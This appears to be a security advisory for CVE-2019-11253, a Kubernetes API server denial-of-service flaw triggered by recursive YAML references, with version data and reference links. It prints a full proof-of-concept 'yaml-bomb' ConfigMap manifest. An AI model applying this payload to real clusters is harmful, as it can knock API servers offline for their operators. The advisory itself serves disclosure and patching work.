CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable.
When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a โBillion Laughsโ attack which is quite well known as an XML parsing issue.
Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.
apiVersion: v1
data:
a: &a ["web","web","web","web","web","web","web","web","web"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
name: yaml-bomb
namespace: default
CPE | Name | Operator | Version |
---|---|---|---|
k8s.io/apimachinery | lt | 0.0.0-20190927203648-9ce6eca90e73 |
github.com/advisories/GHSA-74fp-r6jw-h4mp
github.com/advisories/GHSA-pmqp-h87c-mr78
github.com/kubernetes/kubernetes/issues/83253
github.com/kubernetes/kubernetes/pull/83261
groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs
nvd.nist.gov/vuln/detail/CVE-2019-11253
pkg.go.dev/vuln/GO-2022-0965
stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/